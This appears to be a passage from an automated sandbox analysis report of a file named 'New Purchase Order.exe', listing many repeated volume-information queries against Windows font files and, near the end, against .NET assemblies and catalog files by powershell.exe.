            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
